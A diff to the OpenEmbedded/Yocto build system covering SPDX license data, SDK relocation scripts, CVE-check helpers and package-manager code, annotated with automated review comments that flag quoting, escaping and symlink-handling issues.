5626 "detailsUrl": "https://spdx.org/licenses/PolyForm-Small-Business-1.0.0.json",
5627 "referenceNumber": 450,
5628 "name": "PolyForm Small Business License 1.0.0",
5629 "licenseId": "PolyForm-Small-Business-1.0.0",
5630 "seeAlso": [
5631 "https://polyformproject.org/licenses/small-business/1.0.0"
5632 ],
5633 "isOsiApproved": false
5634 },
5635 {
5636 "reference": "https://spdx.org/licenses/LiLiQ-P-1.1.html",
5637 "isDeprecatedLicenseId": false,
5638 "detailsUrl": "https://spdx.org/licenses/LiLiQ-P-1.1.json",
5639 "referenceNumber": 451,
5640 "name": "Licence Libre du Québec – Permissive version 1.1",
5641 "licenseId": "LiLiQ-P-1.1",
5642 "seeAlso": [
5643 "https://forge.gouv.qc.ca/licence/fr/liliq-v1-1/",
5644 "http://opensource.org/licenses/LiLiQ-P-1.1"
5645 ],
5646 "isOsiApproved": true
5647 },
5648 {
5649 "reference": "https://spdx.org/licenses/NetCDF.html",
5650 "isDeprecatedLicenseId": false,
5651 "detailsUrl": "https://spdx.org/licenses/NetCDF.json",
5652 "referenceNumber": 452,
5653 "name": "NetCDF license",
5654 "licenseId": "NetCDF",
5655 "seeAlso": [
5656 "http://www.unidata.ucar.edu/software/netcdf/copyright.html"
5657 ],
5658 "isOsiApproved": false
5659 },
5660 {
5661 "reference": "https://spdx.org/licenses/OML.html",
5662 "isDeprecatedLicenseId": false,
5663 "detailsUrl": "https://spdx.org/licenses/OML.json",
5664 "referenceNumber": 453,
5665 "name": "Open Market License",
5666 "licenseId": "OML",
5667 "seeAlso": [
5668 "https://fedoraproject.org/wiki/Licensing/Open_Market_License"
5669 ],
5670 "isOsiApproved": false
5671 },
5672 {
5673 "reference": "https://spdx.org/licenses/AGPL-3.0-or-later.html",
5674 "isDeprecatedLicenseId": false,
5675 "detailsUrl": "https://spdx.org/licenses/AGPL-3.0-or-later.json",
5676 "referenceNumber": 454,
5677 "name": "GNU Affero General Public License v3.0 or later",
5678 "licenseId": "AGPL-3.0-or-later",
5679 "seeAlso": [
5680 "https://www.gnu.org/licenses/agpl.txt",
5681 "https://opensource.org/licenses/AGPL-3.0"
5682 ],
5683 "isOsiApproved": true,
5684 "isFsfLibre": true
5685 },
5686 {
5687 "reference": "https://spdx.org/licenses/OLDAP-2.2.html",
5688 "isDeprecatedLicenseId": false,
5689 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.json",
5690 "referenceNumber": 455,
5691 "name": "Open LDAP Public License v2.2",
5692 "licenseId": "OLDAP-2.2",
5693 "seeAlso": [
5694 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d470b0c18ec67621c85881b2733057fecf4a1acc3"
5695 ],
5696 "isOsiApproved": false
5697 },
5698 {
5699 "reference": "https://spdx.org/licenses/BSD-3-Clause.html",
5700 "isDeprecatedLicenseId": false,
5701 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause.json",
5702 "referenceNumber": 456,
5703 "name": "BSD 3-Clause \"New\" or \"Revised\" License",
5704 "licenseId": "BSD-3-Clause",
5705 "seeAlso": [
5706 "https://opensource.org/licenses/BSD-3-Clause"
5707 ],
5708 "isOsiApproved": true,
5709 "isFsfLibre": true
5710 },
5711 {
5712 "reference": "https://spdx.org/licenses/WTFPL.html",
5713 "isDeprecatedLicenseId": false,
5714 "detailsUrl": "https://spdx.org/licenses/WTFPL.json",
5715 "referenceNumber": 457,
5716 "name": "Do What The F*ck You Want To Public License",
5717 "licenseId": "WTFPL",
5718 "seeAlso": [
5719 "http://www.wtfpl.net/about/",
5720 "http://sam.zoy.org/wtfpl/COPYING"
5721 ],
5722 "isOsiApproved": false,
5723 "isFsfLibre": true
5724 },
5725 {
5726 "reference": "https://spdx.org/licenses/OGL-UK-2.0.html",
5727 "isDeprecatedLicenseId": false,
5728 "detailsUrl": "https://spdx.org/licenses/OGL-UK-2.0.json",
5729 "referenceNumber": 458,
5730 "name": "Open Government Licence v2.0",
5731 "licenseId": "OGL-UK-2.0",
5732 "seeAlso": [
5733 "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/2/"
5734 ],
5735 "isOsiApproved": false
5736 },
5737 {
5738 "reference": "https://spdx.org/licenses/BSD-3-Clause-Attribution.html",
5739 "isDeprecatedLicenseId": false,
5740 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Attribution.json",
5741 "referenceNumber": 459,
5742 "name": "BSD with attribution",
5743 "licenseId": "BSD-3-Clause-Attribution",
5744 "seeAlso": [
5745 "https://fedoraproject.org/wiki/Licensing/BSD_with_Attribution"
5746 ],
5747 "isOsiApproved": false
5748 },
5749 {
5750 "reference": "https://spdx.org/licenses/RPSL-1.0.html",
5751 "isDeprecatedLicenseId": false,
5752 "detailsUrl": "https://spdx.org/licenses/RPSL-1.0.json",
5753 "referenceNumber": 460,
5754 "name": "RealNetworks Public Source License v1.0",
5755 "licenseId": "RPSL-1.0",
5756 "seeAlso": [
5757 "https://helixcommunity.org/content/rpsl",
5758 "https://opensource.org/licenses/RPSL-1.0"
5759 ],
5760 "isOsiApproved": true,
5761 "isFsfLibre": true
5762 },
5763 {
5764 "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-DE.html",
5765 "isDeprecatedLicenseId": false,
5766 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-DE.json",
5767 "referenceNumber": 461,
5768 "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 Germany",
5769 "licenseId": "CC-BY-NC-ND-3.0-DE",
5770 "seeAlso": [
5771 "https://creativecommons.org/licenses/by-nc-nd/3.0/de/legalcode"
5772 ],
5773 "isOsiApproved": false
5774 },
5775 {
5776 "reference": "https://spdx.org/licenses/EUPL-1.1.html",
5777 "isDeprecatedLicenseId": false,
5778 "detailsUrl": "https://spdx.org/licenses/EUPL-1.1.json",
5779 "referenceNumber": 462,
5780 "name": "European Union Public License 1.1",
5781 "licenseId": "EUPL-1.1",
5782 "seeAlso": [
5783 "https://joinup.ec.europa.eu/software/page/eupl/licence-eupl",
5784 "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/eupl1.1.-licence-en_0.pdf",
5785 "https://opensource.org/licenses/EUPL-1.1"
5786 ],
5787 "isOsiApproved": true,
5788 "isFsfLibre": true
5789 },
5790 {
5791 "reference": "https://spdx.org/licenses/Sendmail-8.23.html",
5792 "isDeprecatedLicenseId": false,
5793 "detailsUrl": "https://spdx.org/licenses/Sendmail-8.23.json",
5794 "referenceNumber": 463,
5795 "name": "Sendmail License 8.23",
5796 "licenseId": "Sendmail-8.23",
5797 "seeAlso": [
5798 "https://www.proofpoint.com/sites/default/files/sendmail-license.pdf",
5799 "https://web.archive.org/web/20181003101040/https://www.proofpoint.com/sites/default/files/sendmail-license.pdf"
5800 ],
5801 "isOsiApproved": false
5802 },
5803 {
5804 "reference": "https://spdx.org/licenses/ODC-By-1.0.html",
5805 "isDeprecatedLicenseId": false,
5806 "detailsUrl": "https://spdx.org/licenses/ODC-By-1.0.json",
5807 "referenceNumber": 464,
5808 "name": "Open Data Commons Attribution License v1.0",
5809 "licenseId": "ODC-By-1.0",
5810 "seeAlso": [
5811 "https://opendatacommons.org/licenses/by/1.0/"
5812 ],
5813 "isOsiApproved": false
5814 },
5815 {
5816 "reference": "https://spdx.org/licenses/D-FSL-1.0.html",
5817 "isDeprecatedLicenseId": false,
5818 "detailsUrl": "https://spdx.org/licenses/D-FSL-1.0.json",
5819 "referenceNumber": 465,
5820 "name": "Deutsche Freie Software Lizenz",
5821 "licenseId": "D-FSL-1.0",
5822 "seeAlso": [
5823 "http://www.dipp.nrw.de/d-fsl/lizenzen/",
5824 "http://www.dipp.nrw.de/d-fsl/index_html/lizenzen/de/D-FSL-1_0_de.txt",
5825 "http://www.dipp.nrw.de/d-fsl/index_html/lizenzen/en/D-FSL-1_0_en.txt",
5826 "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl",
5827 "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/deutsche-freie-software-lizenz",
5828 "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/german-free-software-license",
5829 "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/D-FSL-1_0_de.txt/at_download/file",
5830 "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/D-FSL-1_0_en.txt/at_download/file"
5831 ],
5832 "isOsiApproved": false
5833 },
5834 {
5835 "reference": "https://spdx.org/licenses/BSD-4-Clause.html",
5836 "isDeprecatedLicenseId": false,
5837 "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause.json",
5838 "referenceNumber": 466,
5839 "name": "BSD 4-Clause \"Original\" or \"Old\" License",
5840 "licenseId": "BSD-4-Clause",
5841 "seeAlso": [
5842 "http://directory.fsf.org/wiki/License:BSD_4Clause"
5843 ],
5844 "isOsiApproved": false,
5845 "isFsfLibre": true
5846 },
5847 {
5848 "reference": "https://spdx.org/licenses/LGPL-2.1.html",
5849 "isDeprecatedLicenseId": true,
5850 "detailsUrl": "https://spdx.org/licenses/LGPL-2.1.json",
5851 "referenceNumber": 467,
5852 "name": "GNU Lesser General Public License v2.1 only",
5853 "licenseId": "LGPL-2.1",
5854 "seeAlso": [
5855 "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
5856 "https://opensource.org/licenses/LGPL-2.1"
5857 ],
5858 "isOsiApproved": true,
5859 "isFsfLibre": true
5860 },
5861 {
5862 "reference": "https://spdx.org/licenses/BSD-2-Clause-Views.html",
5863 "isDeprecatedLicenseId": false,
5864 "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-Views.json",
5865 "referenceNumber": 468,
5866 "name": "BSD 2-Clause with views sentence",
5867 "licenseId": "BSD-2-Clause-Views",
5868 "seeAlso": [
5869 "http://www.freebsd.org/copyright/freebsd-license.html",
5870 "https://people.freebsd.org/~ivoras/wine/patch-wine-nvidia.sh",
5871 "https://github.com/protegeproject/protege/blob/master/license.txt"
5872 ],
5873 "isOsiApproved": false
5874 },
5875 {
5876 "reference": "https://spdx.org/licenses/Artistic-1.0-Perl.html",
5877 "isDeprecatedLicenseId": false,
5878 "detailsUrl": "https://spdx.org/licenses/Artistic-1.0-Perl.json",
5879 "referenceNumber": 469,
5880 "name": "Artistic License 1.0 (Perl)",
5881 "licenseId": "Artistic-1.0-Perl",
5882 "seeAlso": [
5883 "http://dev.perl.org/licenses/artistic.html"
5884 ],
5885 "isOsiApproved": true
5886 },
5887 {
5888 "reference": "https://spdx.org/licenses/NPOSL-3.0.html",
5889 "isDeprecatedLicenseId": false,
5890 "detailsUrl": "https://spdx.org/licenses/NPOSL-3.0.json",
5891 "referenceNumber": 470,
5892 "name": "Non-Profit Open Software License 3.0",
5893 "licenseId": "NPOSL-3.0",
5894 "seeAlso": [
5895 "https://opensource.org/licenses/NOSL3.0"
5896 ],
5897 "isOsiApproved": true
5898 },
5899 {
5900 "reference": "https://spdx.org/licenses/gSOAP-1.3b.html",
5901 "isDeprecatedLicenseId": false,
5902 "detailsUrl": "https://spdx.org/licenses/gSOAP-1.3b.json",
5903 "referenceNumber": 471,
5904 "name": "gSOAP Public License v1.3b",
5905 "licenseId": "gSOAP-1.3b",
5906 "seeAlso": [
5907 "http://www.cs.fsu.edu/~engelen/license.html"
5908 ],
5909 "isOsiApproved": false
5910 },
5911 {
5912 "reference": "https://spdx.org/licenses/Interbase-1.0.html",
5913 "isDeprecatedLicenseId": false,
5914 "detailsUrl": "https://spdx.org/licenses/Interbase-1.0.json",
5915 "referenceNumber": 472,
5916 "name": "Interbase Public License v1.0",
5917 "licenseId": "Interbase-1.0",
5918 "seeAlso": [
5919 "https://web.archive.org/web/20060319014854/http://info.borland.com/devsupport/interbase/opensource/IPL.html"
5920 ],
5921 "isOsiApproved": false
5922 },
5923 {
5924 "reference": "https://spdx.org/licenses/StandardML-NJ.html",
5925 "isDeprecatedLicenseId": true,
5926 "detailsUrl": "https://spdx.org/licenses/StandardML-NJ.json",
5927 "referenceNumber": 473,
5928 "name": "Standard ML of New Jersey License",
5929 "licenseId": "StandardML-NJ",
5930 "seeAlso": [
5931 "http://www.smlnj.org//license.html"
5932 ],
5933 "isOsiApproved": false
5934 }
5935 ],
5936 "releaseDate": "2021-08-08"
5937} \ No newline at end of file
diff --git a/meta/files/toolchain-shar-extract.sh b/meta/files/toolchain-shar-extract.sh
index dd9342758b..4386b985bb 100644
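--- a/meta/files/toolchain-shar-extract.sh
+++ b/meta/files/toolchain-shar-extract.sh
@@ -56,7 +56,8 @@ if ! xz -V > /dev/null 2>&1; then
  exit 1
 fi
 
-DEFAULT_INSTALL_DIR="@SDKPATH@"
+SDK_BUILD_PATH="@SDKPATH@"
+DEFAULT_INSTALL_DIR="@SDKPATHINSTALL@"
 SUDO_EXEC=""
 EXTRA_TAR_OPTIONS=""
 target_sdk_dir=""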
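Review bot: The two placeholder assignments at new lines 59-60 now mean different things, and nothing beside them says which is which. A short comment on each would help, for example `# SDK_BUILD_PATH: prefix baked into the SDK at build time, rewritten by the relocate script` and `# DEFAULT_INSTALL_DIR: install location offered by default`. The first description follows from the relocate hunks in this commit, which substitute `$SDK_BUILD_PATH`. The second is inferred from the variable name and should be confirmed.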
diff --git a/meta/files/toolchain-shar-relocate.sh b/meta/files/toolchain-shar-relocate.sh
index 5433741296..cee9adbf39 100644
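--- a/meta/files/toolchain-shar-relocate.sh
+++ b/meta/files/toolchain-shar-relocate.sh
@@ -5,7 +5,7 @@ fi
 
 # fix dynamic loader paths in all ELF SDK binaries
 native_sysroot=$($SUDO_EXEC cat $env_setup_script |grep 'OECORE_NATIVE_SYSROOT='|cut -d'=' -f2|tr -d '"')
-dl_path=$($SUDO_EXEC find $native_sysroot/lib -name "ld-linux*")
+dl_path=$($SUDO_EXEC find $native_sysroot/lib -maxdepth 1 -name "ld-linux*")
 if [ "$dl_path" = "" ] ; then
  echo "SDK could not be set up. Relocate script unable to find ld-linux.so. Abort!"
  exit 1
@@ -61,7 +61,7 @@ done | xargs -n100 file | grep ":.*\(ASCII\|script\|source\).*text" | \
  -e "$target_sdk_dir/post-relocate-setup" \
  -e "$target_sdk_dir/${0##*/}" | \
  xargs -n100 $SUDO_EXEC sed -i \
- -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:g" \
+ -e "s:$SDK_BUILD_PATH:$target_sdk_dir:g" \
  -e "s:^#! */usr/bin/perl.*:#! /usr/bin/env perl:g" \
  -e "s: /usr/bin/perl: /usr/bin/env perl:g"
 
@@ -72,7 +72,7 @@ fi
 
 # change all symlinks pointing to @SDKPATH@
 for l in $($SUDO_EXEC find $native_sysroot -type l); do
- $SUDO_EXEC ln -sfn $(readlink $l|$SUDO_EXEC sed -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:") $l
+ $SUDO_EXEC ln -sfn $(readlink $l|$SUDO_EXEC sed -e "s:$SDK_BUILD_PATH:$target_sdk_dir:") $l
  if [ $? -ne 0 ]; then
  echo "Failed to setup symlinks. Relocate script failed. Abort!"
  exit 1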
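Review bot: The renamed `sed` expressions at new lines 64 and 75 still splice `$SDK_BUILD_PATH` and `$target_sdk_dir` unescaped into an `s:…:…:` command. A path containing `:`, `&` or a backslash therefore changes or breaks the substitution, and a `.` in the build path matches any character. Because these commands may run under `$SUDO_EXEC`, escape the replacement first, e.g. `esc_target=$(printf '%s\n' "$target_sdk_dir" | sed 's/[&:\\]/\\&/g')`, and escape the pattern side likewise; this matters less if the extract script already rejects such install paths, which is not visible here. At new lines 74-75 `$l` and the `readlink` output are also unquoted, so link names containing whitespace are split; the loop body continues outside the hunk.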
diff --git a/meta/lib/bblayers/create.py b/meta/lib/bblayers/create.py
index 542f31fc81..f49b48d1b4 100644
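--- a/meta/lib/bblayers/create.py
+++ b/meta/lib/bblayers/create.py
@@ -71,7 +71,7 @@ class CreatePlugin(LayerPlugin):
  def register_commands(self, sp):
  parser_create_layer = self.add_command(sp, 'create-layer', self.do_create_layer, parserecipes=False)
  parser_create_layer.add_argument('layerdir', help='Layer directory to create')
- parser_create_layer.add_argument('--priority', '-p', default=6, help='Layer directory to create')
+ parser_create_layer.add_argument('--priority', '-p', default=6, help='Priority of recipes in layer')
  parser_create_layer.add_argument('--example-recipe-name', '-e', dest='examplerecipe', default='example', help='Filename of the example recipe')
  parser_create_layer.add_argument('--example-recipe-version', '-v', dest='version', default='0.1', help='Version number for the example recipe')
 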
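Review bot: The `--priority` option at new line 74 has an integer default but no `type`, so a value given on the command line arrives as a string and non-numeric input is accepted unchecked. Consider `parser_create_layer.add_argument('--priority', '-p', type=int, default=6, help='Priority of recipes in layer')` so that argparse rejects bad values up front. How `do_create_layer` consumes the value is outside this hunk, so confirm nothing depends on the string form.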
diff --git a/meta/lib/buildstats.py b/meta/lib/buildstats.py
index 8627ed3c31..c52b6c3b72 100644
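--- a/meta/lib/buildstats.py
+++ b/meta/lib/buildstats.py
@@ -43,8 +43,8 @@ class SystemStats:
  # depends on the heartbeat event, which fires less often.
  self.min_seconds = 1
 
- self.meminfo_regex = re.compile(b'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)')
- self.diskstats_regex = re.compile(b'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$')
+ self.meminfo_regex = re.compile(rb'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)')
+ self.diskstats_regex = re.compile(rb'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$')
  self.diskstats_ltime = None
  self.diskstats_data = None
  self.stat_ltimes = None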
diff --git a/meta/lib/oe/copy_buildsystem.py b/meta/lib/oe/copy_buildsystem.py
index 31a84f5b06..d97bf9d1b9 100644
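--- a/meta/lib/oe/copy_buildsystem.py
+++ b/meta/lib/oe/copy_buildsystem.py
@@ -20,7 +20,7 @@ def _smart_copy(src, dest):
  mode = os.stat(src).st_mode
  if stat.S_ISDIR(mode):
  bb.utils.mkdirhier(dest)
- cmd = "tar --exclude='.git' --xattrs --xattrs-include='*' -chf - -C %s -p . \
+ cmd = "tar --exclude='.git' --exclude='__pycache__' --xattrs --xattrs-include='*' -chf - -C %s -p . \
  | tar --xattrs --xattrs-include='*' -xf - -C %s" % (src, dest)
  subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
  else:
@@ -259,7 +259,7 @@ def create_locked_sstate_cache(lockedsigs, input_sstate_cache, output_sstate_cac
  bb.note('Generating sstate-cache...')
 
  nativelsbstring = d.getVar('NATIVELSBSTRING')
- bb.process.run("gen-lockedsig-cache %s %s %s %s %s" % (lockedsigs, input_sstate_cache, output_sstate_cache, nativelsbstring, filterfile or ''))
+ bb.process.run("PYTHONDONTWRITEBYTECODE=1 gen-lockedsig-cache %s %s %s %s %s" % (lockedsigs, input_sstate_cache, output_sstate_cache, nativelsbstring, filterfile or ''))
  if fixedlsbstring and nativelsbstring != fixedlsbstring:
  nativedir = output_sstate_cache + '/' + nativelsbstring
  if os.path.isdir(nativedir):
@@ -286,7 +286,7 @@ def check_sstate_task_list(d, targets, filteroutfile, cmdprefix='', cwd=None, lo
  logparam = '-l %s' % logfile
  else:
  logparam = ''
- cmd = "%sBB_SETSCENE_ENFORCE=1 PSEUDO_DISABLED=1 oe-check-sstate %s -s -o %s %s" % (cmdprefix, targets, filteroutfile, logparam)
+ cmd = "%sPYTHONDONTWRITEBYTECODE=1 BB_SETSCENE_ENFORCE=1 PSEUDO_DISABLED=1 oe-check-sstate %s -s -o %s %s" % (cmdprefix, targets, filteroutfile, logparam)
  env = dict(d.getVar('BB_ORIGENV', False))
  env.pop('BUILDDIR', '')
  env.pop('BBPATH', '')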
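Review bot: The tar pipeline in `_smart_copy` still formats `src` and `dest` into a `shell=True` command string without quoting, so a path containing whitespace or shell metacharacters is split or interpreted by the shell instead of being passed as one operand. Quoting both operands closes that: `% (shlex.quote(src), shlex.quote(dest))`, with `import shlex` added if the file does not already have it (its import block is not visible here). The same unquoted `%s` formatting appears in the `gen-lockedsig-cache` command in `create_locked_sstate_cache` and the `oe-check-sstate` command in `check_sstate_task_list`; there `targets` may rely on word splitting, so only the path arguments should be quoted. All three functions continue outside their hunks.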
diff --git a/meta/lib/oe/cve_check.py b/meta/lib/oe/cve_check.py
index ce755f940a..ed4af18ced 100644
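--- a/meta/lib/oe/cve_check.py
+++ b/meta/lib/oe/cve_check.py
@@ -11,8 +11,13 @@ _Version = collections.namedtuple(
 class Version():
 
  def __init__(self, version, suffix=None):
+
+ suffixes = ["alphabetical", "patch"]
+
  if str(suffix) == "alphabetical":
  version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<patch>[-_\.]?(?P<patch_l>[a-z]))?(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
+ elif str(suffix) == "patch":
+ version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<patch>[-_\.]?(p|patch)(?P<patch_l>[0-9]+))?(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
  else:
  version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
  regex = re.compile(r"^\s*" + version_pattern + r"\s*$", re.VERBOSE | re.IGNORECASE)
@@ -23,7 +28,7 @@ class Version():
 
  self._version = _Version(
  release=tuple(int(i) for i in match.group("release").replace("-",".").split(".")),
- patch_l=match.group("patch_l") if str(suffix) == "alphabetical" and match.group("patch_l") else "",
+ patch_l=match.group("patch_l") if str(suffix) in suffixes and match.group("patch_l") else "",
  pre_l=match.group("pre_l"),
  pre_v=match.group("pre_v")
  )
@@ -58,3 +63,150 @@ def _cmpkey(release, patch_l, pre_l, pre_v):
  else:
  _pre = float(pre_v) if pre_v else float('-inf')
  return _release, _patch, _pre
+
+def cve_check_merge_jsons(output, data):
+ """
+ Merge the data in the "package" property to the main data file
+ output
+ """
+ if output["version"] != data["version"]:
+ bb.error("Version mismatch when merging JSON outputs")
+ return
+
+ for product in output["package"]:
+ if product["name"] == data["package"][0]["name"]:
+ bb.error("Error adding the same package %s twice" % product["name"])
+ return
+
+ output["package"].append(data["package"][0])
+
+def update_symlinks(target_path, link_path):
+ """
+ Update a symbolic link link_path to point to target_path.
+ Remove the link and recreate it if exist and is different.
+ """
+ if link_path != target_path and os.path.exists(target_path):
+ if os.path.exists(os.path.realpath(link_path)):
+ os.remove(link_path)
+ os.symlink(os.path.basename(target_path), link_path)
+
+def get_patched_cves(d):
+ """
+ Get patches that solve CVEs using the "CVE: " tag.
+ """
+
+ import re
+ import oe.patch
+
+ pn = d.getVar("PN")
+ cve_match = re.compile("CVE:( CVE\-\d{4}\-\d+)+")
+
+ # Matches the last "CVE-YYYY-ID" in the file name, also if written
+ # in lowercase. Possible to have multiple CVE IDs in a single
+ # file name, but only the last one will be detected from the file name.
+ # However, patch files contents addressing multiple CVE IDs are supported
+ # (cve_match regular expression)
+
+ cve_file_name_match = re.compile(".*([Cc][Vv][Ee]\-\d{4}\-\d+)")
+
+ patched_cves = set()
+ bb.debug(2, "Looking for patches that solves CVEs for %s" % pn)
+ for url in oe.patch.src_patches(d):
+ patch_file = bb.fetch.decodeurl(url)[2]
+
+ # Check patch file name for CVE ID
+ fname_match = cve_file_name_match.search(patch_file)
+ if fname_match:
+ cve = fname_match.group(1).upper()
+ patched_cves.add(cve)
+ bb.debug(2, "Found CVE %s from patch file name %s" % (cve, patch_file))
+
+ # Remote patches won't be present and compressed patches won't be
+ # unpacked, so say we're not scanning them
+ if not os.path.isfile(patch_file):
+ bb.note("%s is remote or compressed, not scanning content" % patch_file)
+ continue
+
+ with open(patch_file, "r", encoding="utf-8") as f:
+ try:
+ patch_text = f.read()
+ except UnicodeDecodeError:
+ bb.debug(1, "Failed to read patch %s using UTF-8 encoding"
+ " trying with iso8859-1" % patch_file)
+ f.close()
+ with open(patch_file, "r", encoding="iso8859-1") as f:
+ patch_text = f.read()
+
+ # Search for one or more "CVE: " lines
+ text_match = False
+ for match in cve_match.finditer(patch_text):
+ # Get only the CVEs without the "CVE: " tag
+ cves = patch_text[match.start()+5:match.end()]
+ for cve in cves.split():
+ bb.debug(2, "Patch %s solves %s" % (patch_file, cve))
+ patched_cves.add(cve)
+ text_match = True
+
+ if not fname_match and not text_match:
+ bb.debug(2, "Patch %s doesn't solve CVEs" % patch_file)
+
+ return patched_cves
+
+
+def get_cpe_ids(cve_product, version):
+ """
+ Get list of CPE identifiers for the given product and version
+ """
+
+ version = version.split("+git")[0]
+
+ cpe_ids = []
+ for product in cve_product.split():
+ # CVE_PRODUCT in recipes may include vendor information for CPE identifiers. If not,
+ # use wildcard for vendor.
+ if ":" in product:
+ vendor, product = product.split(":", 1)
+ else:
+ vendor = "*"
+
+ cpe_id = 'cpe:2.3:a:{}:{}:{}:*:*:*:*:*:*:*'.format(vendor, product, version)
+ cpe_ids.append(cpe_id)
+
+ return cpe_ids
+
+def convert_cve_version(version):
+ """
+ This function converts from CVE format to Yocto version format.
+ eg 8.3_p1 -> 8.3p1, 6.2_rc1 -> 6.2-rc1
+
+ Unless it is redefined using CVE_VERSION in the recipe,
+ cve_check uses the version in the name of the recipe (${PV})
+ to check vulnerabilities against a CVE in the database downloaded from NVD.
+
+ When the version has an update, i.e.
+ "p1" in OpenSSH 8.3p1,
+ "-rc1" in linux kernel 6.2-rc1,
+ the database stores the version as version_update (8.3_p1, 6.2_rc1).
+ Therefore, we must transform this version before comparing to the
+ recipe version.
+
+ In this case, the parameter of the function is 8.3_p1.
+ If the version uses the Release Candidate format, "rc",
+ this function replaces the '_' by '-'.
+ If the version uses the Update format, "p",
+ this function removes the '_' completely.
+ """
+ import re
+
+ matches = re.match('^([0-9.]+)_((p|rc)[0-9]+)$', version)
+
+ if not matches:
+ return version
+
+ version = matches.group(1)
+ update = matches.group(2)
+
+ if matches.group(3) == "rc":
+ return version + '-' + update
+
+ return version + update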
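Review bot: `update_symlinks` tests `os.path.exists(os.path.realpath(link_path))`, which is false for a dangling symlink, so the stale link is left in place and the following `os.symlink(...)` raises FileExistsError. Checking the link itself avoids that: `if os.path.lexists(link_path):` before `os.remove(link_path)`. Separately, the two patterns in `get_patched_cves` (`"CVE:( CVE\-\d{4}\-\d+)+"` and the file-name pattern) are non-raw strings containing `\-` and `\d`; writing them as `r"..."` would be consistent with the raw-bytes fix this same commit applies to `diskstats_regex`.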
diff --git a/meta/lib/oe/gpg_sign.py b/meta/lib/oe/gpg_sign.py
index 7634d7ef1d..492f096eaa 100644
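--- a/meta/lib/oe/gpg_sign.py
+++ b/meta/lib/oe/gpg_sign.py
@@ -111,7 +111,7 @@ class LocalSigner(object):
 
  def verify(self, sig_file):
  """Verify signature"""
- cmd = self.gpg_cmd + [" --verify", "--no-permission-warning"]
+ cmd = self.gpg_cmd + ["--verify", "--no-permission-warning"]
  if self.gpg_path:
  cmd += ["--homedir", self.gpg_path]
 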
diff --git a/meta/lib/oe/license.py b/meta/lib/oe/license.py
index c1274a61de..c4efbe142b 100644
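--- a/meta/lib/oe/license.py
+++ b/meta/lib/oe/license.py
@@ -81,6 +81,9 @@ class FlattenVisitor(LicenseVisitor):
  def visit_Str(self, node):
  self.licenses.append(node.s)
 
+ def visit_Constant(self, node):
+ self.licenses.append(node.value)
+
  def visit_BinOp(self, node):
  if isinstance(node.op, ast.BitOr):
  left = FlattenVisitor(self.choose_licenses)
@@ -234,6 +237,9 @@ class ListVisitor(LicenseVisitor):
  def visit_Str(self, node):
  self.licenses.add(node.s)
 
+ def visit_Constant(self, node):
+ self.licenses.add(node.value)
+
 def list_licenses(licensestr):
  """Simply get a list of all licenses mentioned in a license string.
  Binary operators are not applied or taken into account in any way"""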
diff --git a/meta/lib/oe/package_manager.py b/meta/lib/oe/package_manager.py
index b0660411ea..502dfbe3ed 100644
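--- a/meta/lib/oe/package_manager.py
+++ b/meta/lib/oe/package_manager.py
@@ -403,7 +403,7 @@ class PackageManager(object, metaclass=ABCMeta):
  bb.utils.remove(self.intercepts_dir, True)
  bb.utils.mkdirhier(self.intercepts_dir)
  for intercept in postinst_intercepts:
- bb.utils.copyfile(intercept, os.path.join(self.intercepts_dir, os.path.basename(intercept)))
+ shutil.copy(intercept, os.path.join(self.intercepts_dir, os.path.basename(intercept)))
 
  @abstractmethod
  def _handle_intercept_failure(self, failed_script):
@@ -611,12 +611,13 @@ class PackageManager(object, metaclass=ABCMeta):
  "'%s' returned %d:\n%s" %
  (' '.join(cmd), e.returncode, e.output.decode("utf-8")))
 
- target_arch = self.d.getVar('TARGET_ARCH')
- localedir = oe.path.join(self.target_rootfs, self.d.getVar("libdir"), "locale")
- if os.path.exists(localedir) and os.listdir(localedir):
- generate_locale_archive(self.d, self.target_rootfs, target_arch, localedir)
- # And now delete the binary locales
- self.remove(fnmatch.filter(self.list_installed(), "glibc-binary-localedata-*"), False)
+ if self.d.getVar('IMAGE_LOCALES_ARCHIVE') == '1':
+ target_arch = self.d.getVar('TARGET_ARCH')
+ localedir = oe.path.join(self.target_rootfs, self.d.getVar("libdir"), "locale")
+ if os.path.exists(localedir) and os.listdir(localedir):
+ generate_locale_archive(self.d, self.target_rootfs, target_arch, localedir)
+ # And now delete the binary locales
+ self.remove(fnmatch.filter(self.list_installed(), "glibc-binary-localedata-*"), False)
 
  def deploy_dir_lock(self):
  if self.deploy_dir is None: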
